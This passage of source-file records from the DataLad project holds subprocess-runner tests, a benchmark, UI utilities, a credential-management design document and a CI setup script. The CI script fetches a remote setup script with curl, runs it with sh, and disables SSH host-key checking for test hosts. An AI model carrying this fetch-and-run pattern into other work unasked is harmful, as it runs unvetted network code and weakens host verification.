eq_(res['stdout'].rstrip(), test_msg)\n ok_(not res['stderr'])\n\n\ndef test_runner_failure() -> None:\n runner = Runner()\n with assert_raises(CommandError) as cme:\n runner.run(\n py2cmd('import sys; sys.exit(53)')\n )\n eq_(53, cme.value.code)\n\n # but we bubble up FileNotFoundError if executable does not exist at all\n with assert_raises(FileNotFoundError) as cme:\n runner.run(['dne1l2k3j4']) # be damned the one who makes such a command\n\n\n@with_tempfile(mkdir=True)\ndef test_runner_fix_PWD(path: str = \"\") -> None:\n env = os.environ.copy()\n env['PWD'] = orig_cwd = os.getcwd()\n runner = Runner(cwd=path, env=env)\n res = runner.run(\n py2cmd('import os; print(os.environ[\"PWD\"])'),\n protocol=StdOutCapture,\n )\n assert isinstance(res, dict)\n eq_(res['stdout'].strip(), path) # was fixed up to point to point to cwd's path\n eq_(env['PWD'], orig_cwd) # no side-effect\n\n\n@with_tempfile(mkdir=True)\ndef test_runner_cwd_encoding(path: str = \"\") -> None:\n env = os.environ.copy()\n # Add PWD to env so that runner will temporarily adjust it to point to cwd.\n env['PWD'] = os.getcwd()\n cwd = Path(path) / OBSCURE_FILENAME\n cwd.mkdir()\n # Running doesn't fail if cwd or env has unicode value.\n Runner(cwd=cwd, env=env).run(\n py2cmd(\n 'from pathlib import Path; (Path.cwd() / \"foo\").write_text(\"t\")'))\n (cwd / 'foo').exists()\n\n\n@with_tempfile(mkdir=True)\ndef test_runner_stdin(path: str = \"\") -> None:\n runner = Runner()\n fakestdin = Path(path) / 'io'\n # go for difficult content\n fakestdin.write_text(OBSCURE_FILENAME)\n\n res = runner.run(\n py2cmd('import fileinput; print(fileinput.input().readline())'),\n stdin=fakestdin.open(),\n protocol=StdOutCapture,\n )\n assert isinstance(res, dict)\n assert_in(OBSCURE_FILENAME, res['stdout'])\n\n # we can do the same without a tempfile, too\n res = runner.run(\n py2cmd('import fileinput; print(fileinput.input().readline())'),\n stdin=OBSCURE_FILENAME.encode('utf-8'),\n protocol=StdOutCapture,\n )\n assert isinstance(res, dict)\n assert_in(OBSCURE_FILENAME, res['stdout'])\n\n\[email protected]_slow(3)\ndef test_runner_stdin_no_capture() -> None:\n # Ensure that stdin writing alone progresses\n runner = Runner()\n runner.run(\n py2cmd('import sys; print(sys.stdin.read()[-10:])'),\n stdin=('ABCDEFGHIJKLMNOPQRSTUVWXYZ-' * 2 + '\\n').encode('utf-8'),\n protocol=None\n )\n\n\[email 
protected]_slow(3)\ndef test_runner_no_stdin_no_capture() -> None:\n # Ensure a runner without stdin data and output capture progresses\n runner = Runner()\n runner.run(\n ([\"cmd.exe\", \"/c\"] if on_windows else []) + [\"echo\", \"a\", \"b\", \"c\"],\n stdin=None,\n protocol=None\n )\n\n\[email protected]_slow(3)\ndef test_runner_empty_stdin() -> None:\n # Ensure a runner without stdin data and output capture progresses\n runner = Runner()\n runner.run(\n py2cmd('import sys; print(sys.stdin.read())'),\n stdin=b\"\",\n protocol=None\n )\n\n\ndef test_runner_parametrized_protocol() -> None:\n runner = Runner()\n\n # protocol returns a given value whatever it receives\n class ProtocolInt(StdOutCapture):\n def __init__(self, value: bytes) -> None:\n self.value = value\n super().__init__()\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n super().pipe_data_received(fd, self.value)\n\n res = runner.run(\n py2cmd('print(1, end=\"\")'),\n protocol=ProtocolInt,\n # value passed to protocol constructor\n value=b'5',\n )\n assert isinstance(res, dict)\n eq_(res['stdout'], '5')\n\n\n@integration # ~3 sec\n@with_tempfile(mkdir=True)\n@with_tempfile()\ndef test_asyncio_loop_noninterference1(path1: str = \"\", path2: str = \"\") -> None:\n if on_windows and sys.version_info < (3, 8):\n raise SkipTest(\n \"get_event_loop() raises \"\n \"RuntimeError: There is no current event loop in thread 'MainThread'.\")\n # minimalistic use case provided by Dorota\n import datalad.api as dl\n src = dl.create(path1) # type: ignore[attr-defined]\n reproducer = src.pathobj/ \"reproducer.py\"\n reproducer.write_text(f\"\"\"\\\nimport asyncio\nasyncio.get_event_loop()\nimport datalad.api as datalad\nds = datalad.clone(path=r'{path2}', source=r\"{path1}\")\nloop = asyncio.get_event_loop()\nassert loop\n# simulate outside process closing the loop\nloop.close()\n# and us still doing ok\nds.status()\n\"\"\")\n Runner().run([sys.executable, str(reproducer)]) # if Error -- the test failed\n\n\n@with_tempfile\ndef test_asyncio_forked(temp_: str = \"\") -> None:\n # temp will be used to communicate from child either it succeeded or not\n temp = Path(temp_)\n runner = Runner()\n try:\n pid = os.fork()\n except BaseException as exc:\n # .fork availability is \"Unix\", and there are cases where it is \"not supported\"\n # so we will just skip if no forking is possible\n raise SkipTest(f\"Cannot fork: {exc}\")\n # if does not fail (in original or in a fork) -- we are good\n if sys.version_info < (3, 8) and pid != 0:\n # for some reason it is crucial to sleep a little (but 0.001 is not enough)\n # in the master process with older pythons or it takes forever to make the child run\n sleep(0.1)\n try:\n runner.run([sys.executable, '--version'], protocol=StdOutCapture)\n if pid == 0:\n temp.write_text(\"I rule\")\n except:\n if pid == 0:\n temp.write_text(\"I suck\")\n if pid != 0:\n # parent: look after the child\n t0 = time()\n try:\n while not temp.exists() or temp.stat().st_size < 6:\n if time() - t0 > 5:\n raise AssertionError(\"Child process did not create a file we expected!\")\n finally:\n # kill the child\n os.kill(pid, signal.SIGTERM)\n # see if it was a good one\n eq_(temp.read_text(), \"I rule\")\n else:\n # sleep enough so parent just kills me the kid before I continue doing bad deeds\n sleep(10)\n\n\ndef test_done_deprecation() -> None:\n with unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n _ = Protocol(\"done\")\n warn_mock.assert_called_once()\n\n with 
unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n _ = Protocol()\n warn_mock.assert_not_called()\n\n\ndef test_faulty_poll_detection() -> None:\n popen_mock = unittest.mock.MagicMock(**{\"pid\": 666, \"poll.return_value\": None})\n protocol = Protocol()\n protocol.process = popen_mock\n assert_raises(CommandError, protocol._prepare_result)\n\n\ndef test_kill_output() -> None:\n runner = Runner()\n res = runner.run(\n py2cmd('import sys; sys.stdout.write(\"aaaa\\\\n\"); sys.stderr.write(\"bbbb\\\\n\")'),\n protocol=KillOutput)\n assert isinstance(res, dict)\n eq_(res['stdout'], '')\n eq_(res['stderr'], '')\n\n\n@skip_if_on_windows # no \"hint\" on windows since no ulimit command there\ndef test_too_long() -> None:\n with swallow_logs(new_level=logging.ERROR) as cml:\n with assert_raises(OSError): # we still raise an exception if we exceed too much\n Runner().run(\n [sys.executable, '-c', 'import sys; print(len(sys.argv))'] + [str(i) for i in range(CMD_MAX_ARG)],\n protocol=StdOutCapture\n )\n cml.assert_logged('.*use.*ulimit.*')\n\n\ndef test_path_to_str_conversion() -> None:\n # Regression test to ensure that Path-objects are converted into strings\n # before they are put into the environment variable `$PWD`\n runner = Runner()\n test_path = Path(\"a/b/c\")\n adjusted_env = runner._get_adjusted_env(\n cwd=test_path,\n env=dict(some_key=\"value\")\n )\n assert adjusted_env is not None\n assert str(test_path) == adjusted_env['PWD']\n\n\ndef test_env_copying() -> None:\n # Regression test to ensure environments are only copied\n # if `copy=True` is given to `Runner._get_adjusted_env.`\n # Test also for path adjustments, if not-`None` `pwd`-value\n # is given to `Runner._get_adjusted_env`.\n runner = Runner()\n for original_env in (None, dict(some_key='value')):\n for cwd in (None, Path('a/b/c')):\n for do_copy in (True, False):\n adjusted_env = runner._get_adjusted_env(\n cwd=cwd,\n env=original_env,\n copy=do_copy\n )\n if original_env is None:\n assert adjusted_env is None\n else:\n assert adjusted_env is not None\n if do_copy is True:\n assert adjusted_env is not original_env\n else:\n assert adjusted_env is original_env\n if cwd is None:\n assert 'PWD' not in adjusted_env\n else:\n assert 'PWD' in adjusted_env\n\n\n@with_tempfile(mkdir=True)\ndef test_environment(temp_dir_path: str = \"\") -> None:\n # Ensure that the subprocess sees a string in `$PWD`, even if a Path-object\n # is provided to `cwd`.\n cmd = py2cmd(\"import os; print(os.environ['PWD'])\")\n cwd = Path(temp_dir_path)\n env = dict(SYSTEMROOT=os.environ.get('SYSTEMROOT', ''))\n runner = Runner()\n results = runner.run(cmd=cmd, protocol=StdOutCapture, cwd=cwd, env=env)\n assert isinstance(results, dict)\n output = results['stdout'].splitlines()[0]\n assert output == temp_dir_path\n\n runner = Runner(cwd=cwd, env=env)\n results = runner.run(cmd=cmd, protocol=StdOutCapture)\n assert isinstance(results, dict)\n output = results['stdout'].splitlines()[0]\n assert output == temp_dir_path\n\n\ndef test_argument_priority() -> None:\n class X:\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n self.args = args\n self.kwargs = kwargs\n\n def run(self) -> dict:\n return dict(\n code=0,\n args=self.args,\n kwargs=self.kwargs,\n )\n\n test_path_1 = \"a/b/c\"\n test_env_1 = dict(source=\"constructor\")\n test_path_2 = \"d/e/f\"\n test_env_2 = dict(source=\"run-method\")\n\n with unittest.mock.patch('datalad.runner.runner.ThreadedRunner') as tr_mock:\n\n tr_mock.side_effect = X\n runner = Runner(cwd=test_path_1, 
env=test_env_1)\n\n result = runner.run(\"first-command\")\n assert isinstance(result, dict)\n assert result['kwargs']['cwd'] == test_path_1\n assert result['kwargs']['env'] == {\n **test_env_1,\n 'PWD': test_path_1\n }\n\n result = runner.run(\"second-command\", cwd=test_path_2, env=test_env_2)\n assert isinstance(result, dict)\n assert result['kwargs']['cwd'] == test_path_2\n assert result['kwargs']['env'] == {\n **test_env_2,\n 'PWD': test_path_2\n }\n\n\ndef test_concurrent_execution() -> None:\n runner = Runner()\n caller_threads = []\n\n result_list: list[str] = []\n result_list_lock = Lock()\n\n def target(count: int, r_list: list[str], r_list_lock: Lock) -> None:\n result = runner.run(\n py2cmd(\n \"import time;\"\n \"import sys;\"\n \"time.sleep(1);\"\n \"print('end', sys.argv[1])\",\n str(count)\n ),\n protocol=StdOutCapture,\n )\n assert isinstance(result, dict)\n output = result[\"stdout\"].strip()\n assert output == f\"end {str(count)}\"\n with r_list_lock:\n r_list.append(output)\n\n for c in range(100):\n caller_thread = Thread(\n target=target,\n kwargs=dict(\n count=c,\n r_list=result_list,\n r_list_lock=result_list_lock,\n ))\n caller_thread.start()\n caller_threads.append(caller_thread)\n\n while caller_threads:\n t = caller_threads.pop()\n t.join()\n\n assert len(result_list) == 100\n" }, { "alpha_fraction": 0.6141199469566345, "alphanum_fraction": 0.6170212626457214, "avg_line_length": 31.3125, "blob_id": "a979fd051011ab3e60876c32a961e2fafb2e549e", "content_id": "a2df8a0590a1fd468d95051e2e08b4af3ef40f94", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2068, "license_type": "permissive", "max_line_length": 87, "num_lines": 64, "path": "/benchmarks/plugins/addurls.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# Import functions to be tested with _ suffix and name the suite after the\n# original function so we could easily benchmark it e.g. 
by\n# asv run --python=same -b get_parent_paths\n# without need to discover what benchmark to use etc\n\nimport os\nfrom pathlib import Path, PurePosixPath\nimport datalad.api as dl\n\nfrom ..common import SuprocBenchmarks\n\nimport tempfile\nfrom datalad.utils import get_tempfile_kwargs, rmtree\n\nfrom datalad import lgr\n\n\nclass addurls1(SuprocBenchmarks):\n\n # Try with excluding autometa and not\n params = [None, '*']\n param_names = ['exclude_metadata']\n\n\n def setup(self, exclude_metadata):\n self.nfiles = 20\n self.temp = Path(\n tempfile.mkdtemp(\n **get_tempfile_kwargs({}, prefix='bm_addurls1')))\n\n self.ds = dl.create(self.temp / \"ds\")\n self.ds.config.set('annex.security.allowed-url-schemes', 'file', scope='local')\n\n # populate list.csv and files\n srcpath = PurePosixPath(self.temp)\n\n rows = [\"url,filename,bogus1,bogus2\"]\n for i in range(self.nfiles):\n (self.temp / str(i)).write_text(str(i))\n rows.append(\n \"file://{}/{},{},pocus,focus\"\n .format(srcpath, i, i)\n )\n\n self.listfile = self.temp / \"list.csv\"\n self.listfile.write_text(os.linesep.join(rows))\n\n def teardown(self, exclude_metadata):\n # would make no sense if doesn't work correctly\n # IIRC we cannot provide custom additional depends so cannot import nose\n # assert_repo_status(self.ds.path)\n status = self.ds.status()\n assert all(r['state'] == 'clean' for r in status)\n assert len(status) >= self.nfiles\n rmtree(self.temp)\n\n def time_addurls(self, exclude_autometa):\n lgr.warning(\"CSV: \" + self.listfile.read_text())\n ret = dl.addurls(\n str(self.listfile), '{url}', '{filename}',\n dataset=self.ds,\n exclude_autometa=exclude_autometa\n )\n assert not any(r['status'] == 'error' for r in ret)\n" }, { "alpha_fraction": 0.5044247508049011, "alphanum_fraction": 0.5292878150939941, "avg_line_length": 30.236841201782227, "blob_id": "b739db2473c061e0f98cc39acb69019060bfd0a6", "content_id": "2e64c2321d31cb5cbd68e62a7d9d56c2019ab41b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2373, "license_type": "permissive", "max_line_length": 91, "num_lines": 76, "path": "/datalad/ui/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Various utils oriented to UI\"\"\"\n\nfrom datalad.support import ansi_colors\nfrom datalad.utils import on_windows\nimport struct\n\n\n# origin http://stackoverflow.com/a/3010495/1265472\ndef get_terminal_size():\n \"\"\"Return current terminal size\"\"\"\n if on_windows:\n try:\n from ctypes import windll, create_string_buffer\n\n # stdin handle is -10\n # stdout handle is -11\n # stderr handle is -12\n\n h = windll.kernel32.GetStdHandle(-12)\n csbi = create_string_buffer(22)\n res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)\n except:\n return None, None\n if res:\n (bufx, bufy, curx, cury, wattr,\n left, top, right, bottom, maxx, maxy) = struct.unpack(\"hhhhHhhhhhh\", csbi.raw)\n sizex = right - left + 1\n sizey = bottom - top + 1\n return sizex, sizey\n else:\n return None, None\n else:\n import fcntl\n import termios\n try:\n h, w, hp, wp = struct.unpack(\n 'HHHH',\n 
fcntl.ioctl(0, termios.TIOCGWINSZ,\n struct.pack('HHHH', 0, 0, 0, 0))\n )\n return w, h\n except:\n return None, None\n\n\ndef get_console_width(default_min=20):\n \"\"\"Return console width to use\n\n In some cases shutil reports it to be 0, so we cannot rely on it\n alone\n \"\"\"\n console_width = get_terminal_size()[0] or 0\n # it might still be 0, e.g. in conda builds for 0.10.0\n if console_width <= 0:\n console_width = 80\n elif console_width <= 20:\n # or some other too small to be real number,\n # to prevent crashes below guarantee that it is at least 20\n console_width = 20\n return console_width\n\n\ndef show_hint(msg):\n from datalad.ui import ui\n ui.message(\"{}\".format(\n ansi_colors.color_word(\n msg,\n ansi_colors.YELLOW)))" }, { "alpha_fraction": 0.7818130850791931, "alphanum_fraction": 0.7829391956329346, "avg_line_length": 76.21739196777344, "blob_id": "44a68687b926e74a3fdc46a2e9b0c27cccb165ce", "content_id": "58ea561fa56cdf6276e7c37c12c36a71df143c1a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7104, "license_type": "permissive", "max_line_length": 277, "num_lines": 92, "path": "/docs/source/design/credentials.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_credentials:\n\n*********************\nCredential management\n*********************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nVarious components of DataLad need to be passed credentials to interact with services that require authentication. \nThis includes downloading files, but also things like REST API usage or authenticated cloning.\nKey components of DataLad's credential management are credentials types, providers, authenticators and downloaders.\n\nCredentials\n===========\n\nSupported credential types include basic user/password combinations, access tokens, and a range of tailored solutions for particular services.\nAll credential type implementations are derived from a common :class:`Credential` base class.\nA mapping from string labels to credential classes is defined in ``datalad.downloaders.CREDENTIAL_TYPES``.\n\nImportantly, credentials must be identified by a name.\nThis name is a label that is often hard-coded in the program code of DataLad, any of its extensions, or specified in a dataset or in provider configurations (see below).\n\nGiven a credential ``name``, one or more credential ``component``\\(s) (e.g., ``token``, ``username``, or ``password``) can be looked up by DataLad in at least two different locations.\nThese locations are tried in the following order, and the first successful lookup yields the final value.\n\n1. A configuration item ``datalad.credential.<name>.<component>``.\n Such configuration items can be defined in any location supported by DataLad's configuration system.\n As with any other specification of configuration items, environment variables can be used to set or override credentials.\n Variable names take the form of ``DATALAD_CREDENTIAL_<NAME>_<COMPONENT>``, and standard replacement rules into configuration variable names apply.\n\n2. 
DataLad uses the `keyring` package https://pypi.org/project/keyring to connect to any of its supported back-ends for setting or getting credentials,\n via a wrapper in :mod:`~datalad.support.keyring_`.\n This provides support for credential storage on all major platforms, but also extensibility, providing 3rd-parties to implement and use specialized solutions.\n\nWhen a credential is required for operation, but could not be obtained via any of the above approaches, DataLad can prompt for credentials in interactive terminal sessions.\nInteractively entered credentials will be stored in the active credential store available via the ``keyring`` package.\nNote, however, that the keyring approach is somewhat abused by datalad.\nThe wrapper only uses ``get_/set_password`` of ``keyring`` with the credential's ``FIELDS`` as the name to query (essentially turning the keyring into a plain key-value store) and \"datalad-<CREDENTIAL-LABEL>\" as the \"service name\".\nWith this approach it's not possible to use credentials in a system's keyring that were defined by other, datalad unaware software (or users).\n\nWhen a credential value is known but invalid, the invalid value must be removed or replaced in the active credential store.\nBy setting the configuration flag ``datalad.credentials.force-ask``, DataLad can be instructed to force interactive credential re-entry to effectively override any store credential with a new value.\n\nProviders\n=========\n\nProviders are associating credentials with a context for using them and are defined by configuration files.\nA single provider is represented by :class:`Provider` object and the list of available providers is represented by the :class:`Providers` class.\nA provider is identified by a label and stored in a dedicated config file per provider named `LABEL.cfg`.\nSuch a file can reside in a dataset (under `.datalad/providers/`), at the user level (under `{user_config_dir}/providers`), at the system level (under `{site_config_dir}/providers`) or come packaged with the datalad distribution (in directory `configs` next to `providers.py`).\nSuch a provider specifies a regular expression to match URLs against and assigns authenticator abd credentials to be used for a match.\nCredentials are referenced by their label, which in turn is the name of another section in such a file specifying the type of the credential.\nReferences to credential and authenticator types are strings that are mapped to classes by the following dict definitions:\n\n- ``datalad.downloaders.AUTHENTICATION_TYPES``\n- ``datalad.downloaders.CREDENTIAL_TYPES``\n\nAvailable providers can be loaded by ``Providers.from_config_files`` and ``Providers.get_provider(url)`` will match a given URL against them and return the appropriate `Provider` instance.\nA :class:`Provider` object will determine a downloader to use (derived from :class:`BaseDownloader`), based on the URL's protocol.\n\nNote, that the provider config files are not currently following datalad's general config approach.\nInstead they are special config files, read by :class:`configparser.ConfigParser` that are not compatible with `git-config` and hence the :class:`ConfigManager`.\n\nThere are currently two ways of storing a provider and thus creating its config file: ``Providers.enter_new`` and ``Providers._store_new``.\nThe former will only work interactively and provide the user with options to choose from, while the latter is non-interactive and can therefore only be used, when all properties of the provider config are known and 
passed to it.\nThere's no way at the moment to store an existing :class:`Provider` object directly.\n\nIntegration with Git\n====================\n\nIn addition, there's a special case for interfacing `git-credential`: A dedicated :class:`GitCredential` class is used to talk to Git's ``git-credential`` command instead of the keyring wrapper.\nThis class has identical fields to the :class:`UserPassword` class and thus can be used by the same authenticators.\nSince Git's way to deal with credentials doesn't involve labels but only matching URLs, it is - in some sense - the equivalent of datalad's provider layer.\nHowever, providers don't talk to a backend, credentials do.\nHence, a more seamless integration requires some changes in the design of datalad's credential system as a whole.\n\nIn the opposite direction - making Git aware of datalad's credentials, there's no special casing, though.\nDataLad comes with a `git-credential-datalad` executable.\nWhenever Git is configured to use it by setting `credential.helper=datalad`, it will be able to query datalad's credential system for a provider matching the URL in question and retrieve the referenced by this provider credentials.\nThis helper can also store a new provider+credentials when asked to do so by Git.\nIt can do this interactively, asking a user to confirm/change that config or - if `credential.helper='datalad --non-interactive'` - try to non-interactively store with its defaults.\n\nAuthenticators\n==============\n\nAuthenticators are used by downloaders to issue authenticated requests.\nThey are not easily available to directly be applied to requests being made outside of the downloaders.\n" }, { "alpha_fraction": 0.6970587968826294, "alphanum_fraction": 0.699999988079071, "avg_line_length": 27.33333396911621, "blob_id": "ef7c356029a70311b67c4313a4af0d1cb633039c", "content_id": "28f519e5eb97317ff70850a56e0ae79667151821", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "permissive", "max_line_length": 72, "num_lines": 12, "path": "/datalad/runner/tests/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport sys\n\n\ndef py2cmd(code: str, *additional_arguments: str) -> list[str]:\n \"\"\"Helper to invoke some Python code through a cmdline invocation of\n the Python interpreter.\n\n This should be more portable in some cases.\n \"\"\"\n return [sys.executable, '-c', code] + list(additional_arguments)\n" }, { "alpha_fraction": 0.6593511700630188, "alphanum_fraction": 0.6860687136650085, "avg_line_length": 18.054546356201172, "blob_id": "87fc6433bb07deca84c41357036e442def660a3f", "content_id": "97469b1e51138b96cf70c87dee364d47fb39c108", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1048, "license_type": "permissive", "max_line_length": 86, "num_lines": 55, "path": "/tools/ci/prep-travis-forssh.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\nmkdir -p \"$HOME/.ssh\"\n\nif command -V docker-machine &> /dev/null\nthen docker_host=\"$(docker-machine inspect --format='{{.Driver.IPAddress}}' default)\"\nelse docker_host=localhost\nfi\n\ncat >>\"$HOME/.ssh/config\" <<EOF\n\nHost datalad-test\nHostName $docker_host\nPort 42241\nUser dl\nStrictHostKeyChecking no\nIdentityFile /tmp/dl-test-ssh-id\nEOF\n\ncat >>\"$HOME/.ssh/config\" <<EOF\n\nHost 
datalad-test2\nHostName $docker_host\nPort 42242\nUser dl\nStrictHostKeyChecking no\nIdentityFile /tmp/dl-test-ssh-id\nEOF\n\nls -l \"$HOME/.ssh\"\nchmod go-rwx -R \"$HOME/.ssh\"\nls -ld \"$HOME/.ssh\"\nls -l \"$HOME/.ssh\"\n\nssh-keygen -f /tmp/dl-test-ssh-id -N \"\"\n\ncurl -fSsL \\\n https://raw.githubusercontent.com/datalad-tester/docker-ssh-target/master/setup \\\n >setup-docker-ssh\nsh setup-docker-ssh --key=/tmp/dl-test-ssh-id.pub -2\n\ntries=60\nn=0\nwhile true\ndo nc -vz \"$docker_host\" 42241 && nc -vz \"$docker_host\" 42242 && break\n ((n++))\n if [ \"$n\" -lt \"$tries\" ]\n then sleep 1\n else exit 1\n fi\ndone\n\nssh -v datalad-test exit\nssh -v datalad-test2 exit\n" }, { "alpha_fraction": 0.6568488478660583, "alphanum_fraction": 0.6593328714370728, "avg_line_length": 31.022727966308594, "blob_id": "415007e0972680ec64ae2501144a110fcc78842d", "content_id": "2bede344f03a1558baac5d8870fee1f8ad72af88", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2818, "license_type": "permissive", "max_line_length": 112, "num_lines": 88, "path": "/datalad/customremotes/tests/test_base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for the base of our custom remotes\"\"\"\n\n\nfrom os.path import isabs\n\nimport pytest\n\nfrom datalad.api import (\n Dataset,\n clone,\n)\nfrom datalad.consts import DATALAD_SPECIAL_REMOTE\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n known_failure_githubci_win,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import Path\n\nfrom ..archives import ArchiveAnnexCustomRemote\nfrom ..base import (\n ensure_datalad_remote,\n init_datalad_remote,\n)\n\n\n# PermissionError: [WinError 32] The process cannot access the file because it is being used by another process:\n@known_failure_githubci_win\n@with_tree(tree={'file.dat': ''})\ndef test_get_contentlocation(tdir=None):\n repo = AnnexRepo(tdir, create=True, init=True)\n repo.add('file.dat')\n repo.commit('added file.dat')\n\n # TODO contentlocation would come with eval_availability=True\n key = repo.get_file_annexinfo('file.dat')['key']\n cr = ArchiveAnnexCustomRemote(None, path=tdir)\n key_path = cr.get_contentlocation(key, absolute=False)\n assert not isabs(key_path)\n key_path_abs = cr.get_contentlocation(key, absolute=True)\n assert isabs(key_path_abs)\n assert cr._contentlocations == {key: key_path}\n repo.drop('file.dat', options=['--force'])\n assert not cr.get_contentlocation(key, absolute=True)\n\n\ndef test_ensure_datalad_remote_unkown_remote():\n with assert_raises(ValueError):\n ensure_datalad_remote(\"doesn't matter\", \"unknown\")\n\n\n@with_tempfile\ndef test_ensure_datalad_remote_init_and_enable_needed(path=None):\n from datalad.consts import DATALAD_SPECIAL_REMOTE\n ds = Dataset(path).create(force=True)\n repo = ds.repo\n assert_false(repo.get_remotes())\n ensure_datalad_remote(repo)\n assert_in(DATALAD_SPECIAL_REMOTE, repo.get_remotes())\n\n\[email protected](\"autoenable\", [False, 
True])\n@with_tempfile\ndef test_ensure_datalad_remote_maybe_enable(path=None, *, autoenable):\n path = Path(path)\n ds_a = Dataset(path / \"a\").create(force=True)\n init_datalad_remote(ds_a.repo, DATALAD_SPECIAL_REMOTE,\n autoenable=autoenable)\n\n ds_b = clone(source=ds_a.path, path=path / \"b\")\n repo = ds_b.repo\n if not autoenable:\n assert_not_in(\"datalad\", repo.get_remotes())\n ensure_datalad_remote(repo)\n assert_in(\"datalad\", repo.get_remotes())\n" }, { "alpha_fraction": 0.63456791639328, "alphanum_fraction": 0.6422839760780334, "avg_line_length": 25.776859283447266, "blob_id": "ba3ba6607a617c88a1e3a263c2de2a7cb42227c1", "content_id": "2948f65259fb621dcfe55c4f9aa74e7e025234db", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3240, "license_type": "permissive", "max_line_length": 80, "num_lines": 121, "path": "/datalad/runner/tests/test_threadsafety.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport random\nimport threading\nimport time\nfrom threading import Thread\n\nfrom datalad.tests.utils_pytest import assert_raises\n\nfrom ..coreprotocols import StdOutCapture\nfrom ..nonasyncrunner import ThreadedRunner\nfrom ..protocol import (\n GeneratorMixIn,\n WitlessProtocol,\n)\nfrom .utils import py2cmd\n\n\nclass MinimalGeneratorProtocol(GeneratorMixIn, StdOutCapture):\n def __init__(self) -> None:\n StdOutCapture.__init__(self)\n GeneratorMixIn.__init__(self)\n\n\nclass MinimalStdOutGeneratorProtocol(GeneratorMixIn, StdOutCapture):\n def __init__(self) -> None:\n StdOutCapture.__init__(self)\n GeneratorMixIn.__init__(self)\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n for line in data.decode().splitlines():\n self.send_result((fd, line))\n\n\ndef _runner_with_protocol(protocol: type[WitlessProtocol]) -> ThreadedRunner:\n return ThreadedRunner(\n cmd=py2cmd(\"for i in range(5): print(i)\"),\n protocol_class=protocol,\n stdin=None)\n\n\ndef _run_on(runner: ThreadedRunner,\n iterate: bool,\n exceptions: list[type[BaseException]]\n ):\n try:\n gen = runner.run()\n if iterate:\n for _ in gen:\n time.sleep(random.random())\n except Exception as e:\n exceptions.append(e.__class__)\n\n\ndef _get_run_on_threads(protocol: type[WitlessProtocol],\n iterate: bool\n ) -> tuple[Thread, Thread, list]:\n\n runner = _runner_with_protocol(protocol)\n\n args: tuple[ThreadedRunner, bool, list] = (runner, iterate, [])\n thread_1 = threading.Thread(target=_run_on, args=args)\n thread_2 = threading.Thread(target=_run_on, args=args)\n\n return thread_1, thread_2, args[2]\n\n\ndef _reentry_detection_run(protocol: type[WitlessProtocol],\n iterate: bool\n ) -> list:\n\n thread_1, thread_2, exception = _get_run_on_threads(protocol, iterate)\n\n thread_1.start()\n thread_2.start()\n\n thread_1.join()\n thread_2.join()\n return exception\n\n\ndef test_thread_serialization() -> None:\n # expect that two run calls on the same runner with a non-generator-protocol\n # do not create a runtime error (executions are serialized though)\n\n exceptions = _reentry_detection_run(StdOutCapture, True)\n assert exceptions == []\n\n\ndef test_reentry_detection() -> None:\n runner = _runner_with_protocol(MinimalGeneratorProtocol)\n runner.run()\n assert_raises(RuntimeError, runner.run)\n\n\ndef test_leave_handling() -> None:\n runner = _runner_with_protocol(MinimalStdOutGeneratorProtocol)\n all_results = [\n \"\".join(e[1] for e in runner.run())\n for _ in (0, 
